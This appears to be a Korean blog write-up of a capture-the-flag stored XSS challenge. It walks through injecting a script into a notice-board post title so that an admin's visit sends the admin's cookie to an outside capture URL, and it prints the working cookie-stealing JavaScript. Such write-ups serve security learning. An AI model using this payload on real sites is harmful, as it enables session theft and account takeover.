[Normaltic's CTF] XSS 1
2024. 6. 25. 22:07ㆍ정보보안 및 해킹/CTF
취약 유형 : Stored XSS
로그인 후 메인페이지에 있는 공지사항 클릭
공지사항 글쓰기 클릭
공격자의 스크립트 삽입에 필요한 특수문자 <'"> 중 사용 가능 여부 판단
VPS에서 발듭받은 링크 확인
특수문자가 인코딩 되지 않는 title쪽에 <script></script>와 공격코드 삽입
var cookieData = document.cookie; //쿠키데이터를 cookiData라는 변수에 담음
var i = new Image(); //새 이미지를 생성 및 load
i.src = 'https://enofjwwq6hvui.x.pipedream.net/?cookie=' + cookieData; //이미지의 경로는 VPS에서 발급받은 링크 + cookieData
해당 글의 url을 관리자가 방문할 수 있는 곳으로 옮겨 방문하도록 함
해당 공격 코드가 담긴 글을 관리자가 방문하게 되면서 공격자의 스크립트가 실행되어 관리자의 쿠키를 가져옴
'정보보안 및 해킹 > CTF' 카테고리의 다른 글
| [Normaltic's CTF] XSS3 (0) | 2024.06.25 |
|---|---|
| [Normaltic's CTF] XSS 2 (0) | 2024.06.25 |
| [Normaltic's CTF] SQL Injection Point 4 (0) | 2024.06.10 |
| [Normaltic's CTF] SQL Injection Point 3 (1) | 2024.06.10 |
| [Normaltic's CTF] SQL Injection Point 2 (0) | 2024.06.10 |